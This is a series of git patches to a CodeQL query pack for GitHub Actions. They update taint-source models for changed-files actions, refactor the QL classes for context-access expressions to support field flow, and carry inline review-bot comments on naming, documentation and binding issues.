+ - ["tj-actions/changed-files", "*", "copied_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "copied_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "deleted_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "deleted_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "modified_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "modified_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "renamed_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "renamed_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "type_changed_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "type_changed_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "unmerged_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "unmerged_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "unknown_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "unknown_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "all_changed_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "all_changed_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "other_changed_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "other_changed_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "all_modified_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "all_modified_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "other_modified_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "other_modified_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "other_deleted_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "other_deleted_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "modified_keys", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "modified_keys", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "changed_keys", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "changed_keys", "pull_request_target", "PR changed files"]
\ No newline at end of file
diff --git a/ql/lib/ext/tj-actions_verify-changed-files.yml b/ql/lib/ext/tj-actions_verify-changed-files.yml
index 55aebb0d34a..076ecff353c 100644
--- a/ql/lib/ext/tj-actions_verify-changed-files.yml
+++ b/ql/lib/ext/tj-actions_verify-changed-files.yml
@@ -3,5 +3,5 @@ extensions:
 pack: codeql/actions-all
 extensible: sourceModel
 data:
- - [ "tj-actions/verify-changed-files", "*", "changed-files", "pull_request", "PR changed files" ]
- - [ "tj-actions/verify-changed-files", "*", "changed-files", "pull_request_target", "PR changed files" ]
+ - ["tj-actions/verify-changed-files", "*", "changed-files", "pull_request", "PR changed files"]
+ - ["tj-actions/verify-changed-files", "*", "changed-files", "pull_request_target", "PR changed files"]
From 6627a858e379259e0f9dca2e1fbc54b0fbe5d736 Mon Sep 17 00:00:00 2001
From: jorgectf
Date: Tue, 13 Feb 2024 13:24:25 +0100
Subject: [PATCH 0027/1267] Suffix with `.model`
---
 ...anged-files.yml => ahmadnassri_action-changed-files.model.yml} | 0
 .../ext/{dorny_paths-filter.yml => dorny_paths-filter.model.yml} | 0
 ...et-changed-files.yml => jitterbit_get-changed-files.model.yml} | 0
 ...hanged-files.yml => tj-actions_verify-changed-files.model.yml} | 0
 4 files changed, 0 insertions(+), 0 deletions(-)
 rename ql/lib/ext/{ahmadnassri_action-changed-files.yml => ahmadnassri_action-changed-files.model.yml} (100%)
 rename ql/lib/ext/{dorny_paths-filter.yml => dorny_paths-filter.model.yml} (100%)
 rename ql/lib/ext/{jitterbit_get-changed-files.yml => jitterbit_get-changed-files.model.yml} (100%)
 rename ql/lib/ext/{tj-actions_verify-changed-files.yml => tj-actions_verify-changed-files.model.yml} (100%)
diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml
similarity index 100%
rename from ql/lib/ext/ahmadnassri_action-changed-files.yml
rename to ql/lib/ext/ahmadnassri_action-changed-files.model.yml
diff --git a/ql/lib/ext/dorny_paths-filter.yml b/ql/lib/ext/dorny_paths-filter.model.yml
similarity index 100%
rename from ql/lib/ext/dorny_paths-filter.yml
rename to ql/lib/ext/dorny_paths-filter.model.yml
diff --git a/ql/lib/ext/jitterbit_get-changed-files.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml
similarity index 100%
rename from ql/lib/ext/jitterbit_get-changed-files.yml
rename to ql/lib/ext/jitterbit_get-changed-files.model.yml
diff --git a/ql/lib/ext/tj-actions_verify-changed-files.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml
similarity index 100%
rename from ql/lib/ext/tj-actions_verify-changed-files.yml
rename to ql/lib/ext/tj-actions_verify-changed-files.model.yml
From 29b3d6c9efe6993bf23dfb586c31e1a79939ac57 Mon Sep 17 00:00:00 2001
From: jorgectf
Date: Tue, 13 Feb 2024 15:00:53 +0100
Subject: [PATCH 0028/1267] Prefix sources with `output.`
---
 ...ahmadnassri_action-changed-files.model.yml | 8 +--
 ql/lib/ext/dorny_paths-filter.model.yml | 4 +-
 .../ext/jitterbit_get-changed-files.model.yml | 28 ++++----
 ql/lib/ext/tj-actions_changed-files.model.yml | 68 +++++++++----------
 .../tj-actions_verify-changed-files.model.yml | 4 +-
 5 files changed, 56 insertions(+), 56 deletions(-)
diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml
index bd86b3f843e..3308967eebc 100644
--- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml
+++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: codeql/actions-all
 extensible: sourceModel
 data:
- - ["ahmadnassri/action-changed-files", "*", "files", "pull_request", "PR changed files"]
- - ["ahmadnassri/action-changed-files", "*", "files", "pull_request_target", "PR changed files"]
- - ["ahmadnassri/action-changed-files", "*", "json", "pull_request", "PR changed files"]
- - ["ahmadnassri/action-changed-files", "*", "json", "pull_request_target", "PR changed files"]
+ - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request", "PR changed files"]
+ - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request_target", "PR changed files"]
+ - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request", "PR changed files"]
+ - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request_target", "PR changed files"]
diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml
index c9cdd2dbcc0..d2b2ed48fc5 100644
--- a/ql/lib/ext/dorny_paths-filter.model.yml
+++ b/ql/lib/ext/dorny_paths-filter.model.yml
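Review bot: The `output.` prefix is applied to the `sourceModel` rows here and in the other four files of this commit, but the two `summaryModel` files reformatted in the previous commit (`frabert_replace-string-action.model.yml` and `mad9000_actions-find-and-replace-string.model.yml`) are absent from the diffstat and keep bare names such as `"string"` and `"replaced"`. If the model reader now expects a qualified path in every field (not visible from this patch), those summaries would stop matching and taint through the replace actions would be lost without any error. Either update them in the same commit or state the convention at the top of each model file, e.g. `# sourceModel: third column is an access path starting with "output."`. A test workflow that routes a changed-files output through one of the replace actions would catch a mismatch.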
@@ -3,5 +3,5 @@ extensions:
 pack: codeql/actions-all
 extensible: sourceModel
 data:
- - ["dorny/paths-filter", "*", "changes", "pull_request", "PR changed files"]
- - ["dorny/paths-filter", "*", "changes", "pull_request_target", "PR changed files"]
+ - ["dorny/paths-filter", "*", "output.changes", "pull_request", "PR changed files"]
+ - ["dorny/paths-filter", "*", "output.changes", "pull_request_target", "PR changed files"]
diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml
index 198e60d4245..bc7344eedca 100644
--- a/ql/lib/ext/jitterbit_get-changed-files.model.yml
+++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml
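Review bot: `output.changes` is, per the action's documentation as I recall it, a JSON array of the names of the filters that matched, and those names are written by the workflow author rather than taken from the pull request. The file paths are published under per-filter outputs named `<filter>_files` when `list-files` is enabled, which a fixed row cannot name, so this model may both flag a harmless value and miss the one that carries paths. I would note that above the rows, e.g. `# changes holds filter names; file paths are in <filter>_files and need a pattern or QL model`, and cover the per-filter outputs in a follow-up.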
@@ -3,17 +3,17 @@ extensions:
 pack: codeql/actions-all
 extensible: sourceModel
 data:
- - ["jitterbit/get-changed-files", "*", "all", "pull_request", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "all", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "added", "pull_request", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "added", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "modified", "pull_request", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "modified", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "removed", "pull_request", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "removed", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "renamed", "pull_request", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "renamed", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "added_modified", "pull_request", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "added_modified", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "deleted", "pull_request", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "deleted", "pull_request_target", "PR changed files"]
\ No newline at end of file
+ - ["jitterbit/get-changed-files", "*", "output.all", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.all", "pull_request_target", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.added", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.added", "pull_request_target", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request_target", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.removed", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.removed", "pull_request_target", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request_target", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request_target", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request_target", "PR changed files"]
\ No newline at end of file
diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml
index 1ef816727e1..b3b8baed7fc 100644
--- a/ql/lib/ext/tj-actions_changed-files.model.yml
+++ b/ql/lib/ext/tj-actions_changed-files.model.yml
@@ -3,37 +3,37 @@ extensions:
 pack: codeql/actions-all
 extensible: sourceModel
 data:
- - ["tj-actions/changed-files", "*", "added_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "added_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "copied_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "copied_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "deleted_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "deleted_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "modified_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "modified_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "renamed_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "renamed_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "type_changed_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "type_changed_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "unmerged_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "unmerged_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "unknown_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "unknown_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "all_changed_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "all_changed_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "other_changed_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "other_changed_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "all_modified_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "all_modified_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "other_modified_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "other_modified_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "other_deleted_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "other_deleted_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "modified_keys", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "modified_keys", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "changed_keys", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "changed_keys", "pull_request_target", "PR changed files"]
\ No newline at end of file
+ - ["tj-actions/changed-files", "*", "output.added_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.added_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.deleted_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.deleted_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"]
\ No newline at end of file
diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml
index 076ecff353c..408abfbb8d0 100644
--- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml
+++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: codeql/actions-all
 extensible: sourceModel
 data:
- - ["tj-actions/verify-changed-files", "*", "changed-files", "pull_request", "PR changed files"]
- - ["tj-actions/verify-changed-files", "*", "changed-files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request", "PR changed files"]
+ - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request_target", "PR changed files"]
From e6b4676f9086d10bae70eb380bca48fa635eaf96 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 14 Feb 2024 10:47:00 +0100 Subject: [PATCH 0029/1267] feat(field-flow): enhance dataflow tracking implement field flow to reduce false positives --- ql/lib/codeql/actions/Ast.qll | 146 +++++++++++++----- .../codeql/actions/ast/internal/Actions.qll | 6 +- .../codeql/actions/dataflow/ExternalFlow.qll | 76 +++++++-- .../codeql/actions/dataflow/FlowSources.qll | 34 +--- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 59 ++----- .../dataflow/internal/DataFlowPrivate.qll | 116 +++++++++++--- .../dataflow/internal/DataFlowPublic.qll | 47 ++++-- ql/lib/ext/tj-actions-changed-files.model.yml | 46 +++--- .../Security/CWE-094/ExpressionInjection.ql | 4 +- ql/src/test/.github/workflows/ci-cleanup.yml | 47 ------ .../workflows/image_link_generator.yml | 24 +-- .../workflows/image_link_generator_2.yml | 61 -------- .../workflows/image_link_generator_3.yml | 27 ---- .../workflows/{inter1.yml => inter-job.yml} | 0 ql/src/test/.github/workflows/simple1.yml | 9 +- ql/src/test/.github/workflows/simple2.yml | 6 + ql/src/test/.github/workflows/test.yml | 7 +- 17 files changed, 377 insertions(+), 338 deletions(-) delete mode 100644 ql/src/test/.github/workflows/ci-cleanup.yml delete mode 100644 ql/src/test/.github/workflows/image_link_generator_2.yml delete mode 100644 ql/src/test/.github/workflows/image_link_generator_3.yml rename ql/src/test/.github/workflows/{inter1.yml => inter-job.yml} (100%) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 6307897685f..087b7f19e62 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -95,6 +95,8 @@ class OutputsStmt extends Statement instanceof YamlMapping { this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result or this.(YamlMapping).lookup(name) = result } + + string getAnOutputName() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) } } class InputExpr extends Expression instanceof YamlString { 
@@ -158,6 +160,10 @@ class JobStmt extends Statement instanceof Actions::Job { * arg1: value1 */ JobUsesExpr getUsesExpr() { result.getJobStmt() = this } + + predicate usesReusableWorkflow() { + this.(YamlMapping).maps(any(YamlString s | s.getValue() = "uses"), _) + } } /** 
@@ -353,26 +359,51 @@ class ExprAccessExpr extends Expression instanceof YamlString { string getExpression() { result = expr } JobStmt getJobStmt() { result.getAChildNode*() = this } +} + +/** + * A context access expression. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + */ +class CtxAccessExpr extends ExprAccessExpr { + CtxAccessExpr() { + expr.regexpMatch([ + stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex() + ]) + } + + abstract string getFieldName(); abstract Expression getRefExpr(); } +private string stepsCtxRegex() { result = "steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)" } + +private string needsCtxRegex() { result = "needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)" } + +private string jobsCtxRegex() { result = "jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)" } + +private string envCtxRegex() { result = "env\\.([A-Za-z0-9_-]+)" } + +private string inputsCtxRegex() { result = "inputs\\.([A-Za-z0-9_-]+)" } + /** - * Holds for an ExprAccessExpr accesing the `steps` context. + * Holds for an expression accesing the `steps` context. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. 
`${{ steps.changed-files.outputs.all_changed_files }}` */ -class StepOutputAccessExpr extends ExprAccessExpr { +class StepsCtxAccessExpr extends CtxAccessExpr { string stepId; - string varName; + string fieldName; - StepOutputAccessExpr() { - stepId = - this.getExpression().regexpCapture("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.[A-Za-z0-9_-]+", 1) and - varName = - this.getExpression().regexpCapture("steps\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 1) + StepsCtxAccessExpr() { + expr.regexpMatch(stepsCtxRegex()) and + stepId = expr.regexpCapture(stepsCtxRegex(), 1) and + fieldName = expr.regexpCapture(stepsCtxRegex(), 2) } + override string getFieldName() { result = fieldName } + override Expression getRefExpr() { this.getLocation().getFile() = result.getLocation().getFile() and result.(StepStmt).getId() = stepId 
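Review bot: The QLDoc added for the context classes is written as predicate documentation and carries a typo: `Holds for an expression accesing the steps context` sits on a class, "accesing" recurs on the needs, jobs and env classes in the next hunk, and the inputs class there reads `Holds for an expression the inputs context`. I would phrase them as class docs, e.g. `An expression accessing the steps context, e.g. ${{ steps.changed-files.outputs.all_changed_files }}.` The new abstract `getFieldName()` on `CtxAccessExpr` has no QLDoc at all; a one-line comment saying it returns the last path segment (the output, input or env variable name captured by the regex) would make the later `FieldContent` code easier to follow.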
@@ -380,79 +411,112 @@ class StepOutputAccessExpr extends ExprAccessExpr { } /** - * Holds for an ExprAccessExpr accesing the `needs` or `job` contexts. + * Holds for an expression accesing the `needs` context. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability - * e.g. `${{ needs.job1.outputs.foo}}` or `${{ jobs.job1.outputs.foo}}` (for reusable workflows) + * e.g. `${{ needs.job1.outputs.foo}}` */ -class JobOutputAccessExpr extends ExprAccessExpr { +class NeedsCtxAccessExpr extends CtxAccessExpr { + JobStmt job; string jobId; - string varName; + string fieldName; - JobOutputAccessExpr() { - jobId = - this.getExpression() - .regexpCapture("(needs|jobs)\\.([A-Za-z0-9_-]+)\\.outputs\\.[A-Za-z0-9_-]+", 2) and - varName = - this.getExpression() - .regexpCapture("(needs|jobs)\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 2) + NeedsCtxAccessExpr() { + expr.regexpMatch(needsCtxRegex()) and + jobId = expr.regexpCapture(needsCtxRegex(), 1) and + fieldName = expr.regexpCapture(needsCtxRegex(), 2) and + job.getId() = jobId } + predicate usesReusableWorkflow() { job.usesReusableWorkflow() } + + override string getFieldName() { result = fieldName } + + override Expression getRefExpr() { + job.getLocation().getFile() = this.getLocation().getFile() and + ( + // regular jobs + job.getOutputStmt().getOutputExpr(fieldName) = result + or + // jobs calling reusable workflows + job.getUsesExpr() = result + ) + } +} + +/** + * Holds for an expression accesing the `jobs` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. 
`${{ jobs.job1.outputs.foo}}` (within reusable workflows) + */ +class JobsCtxAccessExpr extends CtxAccessExpr { + string jobId; + string fieldName; + + JobsCtxAccessExpr() { + expr.regexpMatch(jobsCtxRegex()) and + jobId = expr.regexpCapture(jobsCtxRegex(), 1) and + fieldName = expr.regexpCapture(jobsCtxRegex(), 2) + } + + override string getFieldName() { result = fieldName } + override Expression getRefExpr() { exists(JobStmt job | job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile() and - ( - // A Job can have multiple outputs, so we need to check both - // jobs..outputs. - job.getOutputStmt().getOutputExpr(varName) = result - or - // jobs..uses (variables returned from the reusable workflow - job.getUsesExpr() = result - ) + job.getOutputStmt().getOutputExpr(fieldName) = result ) } } /** - * Holds for an ExprAccessExpr accesing the `inputs` context. + * Holds for an expression the `inputs` context. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ inputs.foo }}` */ -class InputAccessExpr extends ExprAccessExpr { - string paramName; +class InputsCtxAccessExpr extends CtxAccessExpr { + string fieldName; - InputAccessExpr() { - paramName = this.getExpression().regexpCapture("inputs\\.([A-Za-z0-9_-]+)", 1) + InputsCtxAccessExpr() { + expr.regexpMatch(inputsCtxRegex()) and + fieldName = expr.regexpCapture(inputsCtxRegex(), 1) } + override string getFieldName() { result = fieldName } + override Expression getRefExpr() { exists(ReusableWorkflowStmt w | w.getLocation().getFile() = this.getLocation().getFile() and - w.getInputsStmt().getInputExpr(paramName) = result + w.getInputsStmt().getInputExpr(fieldName) = result ) or exists(CompositeActionStmt a | a.getLocation().getFile() = this.getLocation().getFile() and - a.getInputsStmt().getInputExpr(paramName) = result + a.getInputsStmt().getInputExpr(fieldName) = result ) } } /** - * Holds for an ExprAccessExpr accesing the `env` context. 
+ * Holds for an expression accesing the `env` context. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ env.foo }}` */ -class EnvAccessExpr extends ExprAccessExpr { - string varName; +class EnvCtxAccessExpr extends CtxAccessExpr { + string fieldName; - EnvAccessExpr() { varName = this.getExpression().regexpCapture("env\\.([A-Za-z0-9_-]+)", 1) } + EnvCtxAccessExpr() { + expr.regexpMatch(envCtxRegex()) and + fieldName = expr.regexpCapture(envCtxRegex(), 1) + } + + override string getFieldName() { result = fieldName } override Expression getRefExpr() { - exists(JobUsesExpr s | s.getEnvExpr(varName) = result) + exists(JobUsesExpr s | s.getEnvExpr(fieldName) = result) or - exists(StepUsesExpr s | s.getEnvExpr(varName) = result) + exists(StepUsesExpr s | s.getEnvExpr(fieldName) = result) or - exists(RunExpr s | s.getEnvExpr(varName) = result) + exists(RunExpr s | s.getEnvExpr(fieldName) = result) } } diff --git a/ql/lib/codeql/actions/ast/internal/Actions.qll b/ql/lib/codeql/actions/ast/internal/Actions.qll index a11759b0c93..2fb17eef88b 100644 --- a/ql/lib/codeql/actions/ast/internal/Actions.qll +++ b/ql/lib/codeql/actions/ast/internal/Actions.qll @@ -294,8 +294,10 @@ module Actions { /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ string getGitHubRepository() { result = - this.getValue().regexpCapture(usesParser(), 1) + "/" + - this.getValue().regexpCapture(usesParser(), 2) + ( + this.getValue().regexpCapture(usesParser(), 1) + "/" + + this.getValue().regexpCapture(usesParser(), 2) + ).toLowerCase() } /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index b19fbcbaca6..c2da24ba52c 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll 
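Review bot: In `NeedsCtxAccessExpr` the `job` field is bound only by `job.getId() = jobId`, so it ranges over every job with that id in any workflow file of the database; the same-file restriction appears only inside `getRefExpr()`. `usesReusableWorkflow()` therefore looks able to hold because an unrelated workflow has a job of the same id (`build`, `test`) that calls a reusable workflow, since as far as I can tell separate member-predicate calls do not share one binding of the field. I would move the constraint into the characteristic predicate: `job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile()`. `EnvCtxAccessExpr.getRefExpr()` in the same hunk has no file restriction either, which deserves a comment if it is intentional.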
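Review bot: The doc comment on `getGitHubRepository()` still gives `actions/checkout` as the result without saying that the value is now lower-cased. Any caller that compares this value with a model row or a literal has to fold case as well (the ExternalFlow.qll hunks in this commit do so with `action.toLowerCase()`), so I would state it in the comment: `/** Gets the lower-cased owner and name of the repository where the Action comes from, e.g. actions/checkout in Actions/Checkout@v2. */`. The enclosing class starts outside the hunk.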
